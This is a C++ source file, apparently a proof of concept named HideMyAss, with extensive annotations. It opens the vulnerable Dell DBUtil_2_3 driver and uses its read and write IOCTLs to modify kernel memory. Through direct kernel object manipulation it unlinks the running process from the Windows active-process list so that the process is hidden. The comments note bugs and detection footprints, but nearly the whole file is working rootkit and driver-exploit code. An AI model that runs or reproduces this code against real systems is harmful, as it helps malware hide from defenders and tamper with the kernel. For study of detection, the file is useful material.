// HideMyAss.cpp : 此檔案包含 'main' 函式。程式會於該處開始執行及結束執行。
//
#include <iostream>
#include <windows.h>
#include <Psapi.h>
#include "typedefs.h"
// Handle to the DBUtil_2_3 device opened in main(); every read/write primitive below goes through it.
// It is never closed explicitly in this file (released only at process exit).
HANDLE Device;
// Declared but never assigned or read anywhere in this file; main() builds its own CLIENT_ID inline.
CLIENT_ID ourProc;
// Kernel address of the System process EPROCESS, produced by PsInitialSystemProcess() in main()
// and used as the starting node for the ActiveProcessLinks walk in LookupEprocessByPid().
DWORD64 systemEprocessAddr;
// Driver-specific control codes consumed by ReadPrimitive()/WritePrimitive(). Everything in this
// file relies on the driver servicing them with a read or write of a caller-supplied kernel address.
// From a defensive standpoint, a user-mode process opening this device and issuing these two codes
// is the observable footprint; the driver itself has to be present on the host for any of this to work.
static const DWORD DBUTIL_READ_IOCTL = 0x9B0C1EC4;
static const DWORD DBUTIL_WRITE_IOCTL = 0x9B0C1EC8;
// Returns the load address of the first entry reported by EnumDeviceDrivers, or NULL if the
// enumeration fails. PsInitialSystemProcess() treats that entry as the kernel image base; the
// function itself does nothing to confirm that drivers[0] really is ntoskrnl.
DWORD64 GetKernelBaseAddress() {
    DWORD cb = 0;
    LPVOID drivers[1024];
    // cb receives the number of bytes needed, but it is never compared against sizeof(drivers),
    // so a truncated enumeration is indistinguishable from a complete one here.
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cb)) {
        return (DWORD64)drivers[0];
    }
    return NULL;
}
// Reads one value at kernel address `Address` by sending DBUTIL_READ_IOCTL to the driver.
// The buffer layout (DBUTIL_READ_BUFFER, field `value`) comes from typedefs.h and is not
// visible here. The DeviceIoControl result and BytesRead are both ignored: on a failed call
// the function returns whatever `value` holds — presumably the 0 from value-initialisation —
// so callers cannot tell a failed read from a genuine zero.
DWORD ReadPrimitive(DWORD64 Address) {
    DBUTIL_READ_BUFFER ReadBuff{};   // value-initialised; same buffer is used for input and output
    ReadBuff.Address = Address;
    DWORD BytesRead;                 // NOTE(review): uninitialised and never inspected
    DeviceIoControl(Device,
        DBUTIL_READ_IOCTL,
        &ReadBuff,
        sizeof(ReadBuff),
        &ReadBuff,
        sizeof(ReadBuff),
        &BytesRead,
        nullptr);                    // BOOL result discarded
    return ReadBuff.value;
}
// Writes `Value` to kernel address `Address` by sending DBUTIL_WRITE_IOCTL to the driver.
// The buffer layout (DBUTIL_WRITE_BUFFER) comes from typedefs.h. The DeviceIoControl result
// and BytesWritten are ignored, so a caller has no way to learn that a write did not happen;
// HideMyProcess() relies on several of these writes succeeding in sequence.
void WritePrimitive(DWORD64 Address, long long Value) {
    DBUTIL_WRITE_BUFFER WriteBuff{};   // value-initialised; same buffer used as input and output
    WriteBuff.Address = Address;
    WriteBuff.Value = Value;
    DWORD BytesWritten = 0;            // set by the call but never checked
    DeviceIoControl(Device,
        DBUTIL_WRITE_IOCTL,
        &WriteBuff,
        sizeof(WriteBuff),
        &WriteBuff,
        sizeof(WriteBuff),
        &BytesWritten,
        nullptr);                      // BOOL result discarded
}
// Returns the low byte at `Address`. The mask 0xffffff keeps 24 bits, not 8; the result is
// still the low byte only because the implicit DWORD -> BYTE conversion truncates it.
// Not called anywhere in this file.
BYTE ReadBYTE(DWORD64 Address) {
    return ReadPrimitive(Address) & 0xffffff;
}
// Returns the low 16 bits at `Address` (one driver read, masked). Not called anywhere in this file.
WORD ReadWORD(DWORD64 Address) {
    return ReadPrimitive(Address) & 0xffff;
}
// Returns the 32-bit value at `Address`; thin alias for ReadPrimitive used by ReadDWORD64.
DWORD ReadDWORD(DWORD64 Address) {
    return ReadPrimitive(Address);
}
// Returns the 64-bit value at `Address`, assembled from two separate 32-bit reads
// (high half at Address + 4, low half at Address). Because these are two distinct IOCTLs,
// the read is not atomic: a value the kernel updates between the two calls comes back torn.
// Every pointer the list walk below follows is obtained this way.
DWORD64 ReadDWORD64(DWORD64 Address) {
    return (static_cast<DWORD64>(ReadDWORD(Address + 4)) << 32) | ReadDWORD(Address);
}
// Writes a 64-bit `Value` to `Address`; thin alias for WritePrimitive. Callers in this file pass
// DWORD64 addresses and 0, which convert implicitly to the signed long long parameter.
void WriteDWORD64(DWORD64 Address, long long Value) {
    WritePrimitive(Address, Value);
}
// Kernel image base as reported by GetKernelBaseAddress(); zero (static storage) until main()
// assigns it. PsInitialSystemProcess() returns 0 while this is still zero.
ULONG64 kernelBase;
// Resolves the kernel-mode address of the exported variable PsInitialSystemProcess and returns
// the pointer stored there (used by main() as the System process EPROCESS), or 0 while
// kernelBase is unset.
//   1. LoadLibrary maps ntoskrnl.exe into this process, apparently only to obtain export RVAs;
//   2. GetProcAddress yields the export's user-mode address; subtracting ntos leaves the RVA;
//   3. rebasing the RVA onto kernelBase gives the kernel address, which is read via ReadDWORD64.
// Failure of LoadLibrary or GetProcAddress is not checked (with ntos == 0 the "RVA" is garbage),
// and the module handle is never freed. The image LoadLibrary finds is assumed to match the
// running kernel build — nothing here verifies that.
DWORD64 PsInitialSystemProcess()
{
    DWORD64 res = 0;
    ULONG64 ntos = (ULONG64)LoadLibrary(L"ntoskrnl.exe");
    ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
    if (kernelBase) {   // 0 until main() has called GetKernelBaseAddress()
        res = ReadDWORD64(addr - ntos + kernelBase);
    }
    return res;
}
// Hard-coded field offsets for one specific ntoskrnl build (which build is not stated in this
// file). The members are filled positionally by aggregate initialisation in `Offsets`, so the
// declaration order here must match the initialiser order there. Only ActiveProcessLinks,
// UniqueProcessId and ThreadListEntry are read in this file; the remaining members are unused
// here. On any other kernel build these values point at the wrong fields and the list walk in
// LookupEprocessByPid() follows garbage pointers.
class NtoskrnlOffsetsBuild
{
public:
    DWORD64 ActiveProcessLinks;   // used: LIST_ENTRY walked by LookupEprocessByPid / HideMyProcess
    DWORD64 UniqueProcessId;      // used: PID compared during the walk
    DWORD64 ThreadListHead;       // unused in this file
    DWORD64 Protection;           // unused in this file
    DWORD64 Token;                // unused in this file
    DWORD64 ObjectTable;          // unused in this file
    DWORD64 TrapFrame;            // unused in this file
    DWORD64 Rip;                  // unused in this file
    DWORD64 ThreadListEntry;      // used: HideMyProcess zeroes the QWORD at this offset + 8
    DWORD64 Cid;                  // unused in this file
    DWORD64 EtwThreatIntProvRegHandle;   // unused in this file
    DWORD64 GuidEntry;            // unused in this file
    DWORD64 EnableInfo;           // unused in this file
    DWORD64 Guid;                 // unused in this file
};
// Positional aggregate initialisation: the Nth value lands in the Nth member of
// NtoskrnlOffsetsBuild. Inserting or reordering a member silently shifts every later value.
NtoskrnlOffsetsBuild Offsets = { 0x448,0x440,0x5e0, 0x87a,0x4b8,0x570, 0x90, 0x168, 0x4e8, 0x478, 0xc19838, 0x20, 0x60, 0x28 };
//pid 4 as stop
// Walks the ActiveProcessLinks list forward starting from `papaProc` (the System EPROCESS in
// this file) and returns the EPROCESS whose UniqueProcessId equals procid.UniqueProcess.
// Every pointer and PID is fetched through the driver via ReadDWORD64; each node address is
// recovered by subtracting Offsets.ActiveProcessLinks from the LIST_ENTRY address.
// Despite the comment above, the loop has no stop condition other than a PID match: a PID that
// is not on the list (or a failed read, which ReadPrimitive reports as 0) keeps the walk going.
DWORD64 LookupEprocessByPid(DWORD64 papaProc, CLIENT_ID procid) {
    DWORD64 ActiveProcLinkPointer = papaProc + Offsets.ActiveProcessLinks;
    DWORD64 nextFlinkAddr = ReadDWORD64(ActiveProcLinkPointer);
    DWORD64 nextEproccess = nextFlinkAddr - Offsets.ActiveProcessLinks;   // LIST_ENTRY -> EPROCESS
    DWORD64 targetPID = ReadDWORD64(nextEproccess + Offsets.UniqueProcessId);
    while (targetPID != (DWORD64)procid.UniqueProcess) {
        nextFlinkAddr = ReadDWORD64(nextEproccess + Offsets.ActiveProcessLinks);
        nextEproccess = nextFlinkAddr - Offsets.ActiveProcessLinks;
        targetPID = ReadDWORD64(nextEproccess + Offsets.UniqueProcessId);
    }
    return nextEproccess;
}
// Unlinks the EPROCESS identified by `OurProc` from the kernel's ActiveProcessLinks list
// (direct kernel object manipulation), so consumers that enumerate processes by walking that
// list no longer see it. The writes, all through the unchecked driver primitive, are:
//   prev.Flink = ourFlink          (ourBlink is the previous node's LIST_ENTRY; Flink is at +0)
//   next.Blink = ourBlink          (+8 is the Blink slot of the next node's LIST_ENTRY)
//   our.Flink  = 0                 (our own Blink is left pointing at the old neighbour)
//   QWORD at our EPROCESS + ThreadListEntry + 8 = 0   (purpose not stated in this file)
// Nothing is verified or reversible from here: the process keeps running with a partially
// zeroed LIST_ENTRY inside a live EPROCESS. That inconsistency is precisely what a cross-view
// comparison (list walk versus an independent process view) surfaces, and a later kernel walk
// through this node could fault on the zeroed pointer.
void HideMyProcess(CLIENT_ID OurProc) {
    DWORD64 ourEproc = LookupEprocessByPid(systemEprocessAddr, OurProc);
    DWORD64 ourFlink = ReadDWORD64(ourEproc + Offsets.ActiveProcessLinks);
    DWORD64 ourBlink = ReadDWORD64(ourEproc + Offsets.ActiveProcessLinks + 0x8);
    WriteDWORD64(ourBlink, ourFlink);          // prev.Flink = next
    WriteDWORD64(ourFlink + 8, ourBlink);      // next.Blink = prev
    WriteDWORD64(ourEproc + Offsets.ActiveProcessLinks, 0);        // our Flink only
    WriteDWORD64(ourEproc + Offsets.ThreadListEntry + 0x8, 0);
    std::cout << "[#]Cant see me (-john cena)" << std::endl;
}
// Entry point: opens the driver's device, resolves the kernel base and the System EPROCESS,
// then unlinks the current process from the active-process list. No result of the kernel
// lookups is validated before use.
int main()
{
    DWORD64 EtwProvRegHandle;      // unused in this file
    DWORD64 GUIDRegEntryAddress;   // unused in this file
    // Dead call: kernelBase is still 0 at this point (static storage, assigned only after the
    // device is opened), so PsInitialSystemProcess() returns 0; the value is overwritten below.
    systemEprocessAddr = PsInitialSystemProcess();
    DWORD64 ourEproc;              // unused in this file
    // Opens the DBUtil_2_3 device for read/write. The driver has to be loaded already; this open
    // together with the two IOCTL codes is what a defender would look for to detect this activity.
    Device = CreateFileW(L"\\\\.\\DBUtil_2_3", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
    if (Device == INVALID_HANDLE_VALUE) {
        std::cout << "Unable to obtain a handle to the device object: " << GetLastError() << std::endl;
        ExitProcess(0);   // exit status 0 even though this is the failure path
    }
    kernelBase = GetKernelBaseAddress();
    systemEprocessAddr = PsInitialSystemProcess();
    // Neither value above is checked for 0. With systemEprocessAddr == 0, LookupEprocessByPid
    // starts reading at Offsets.ActiveProcessLinks treated as an absolute kernel address.
    // Device is never closed with CloseHandle; it is released only when the process exits.
    HideMyProcess( CLIENT_ID { (HANDLE)GetCurrentProcessId(), nullptr});
}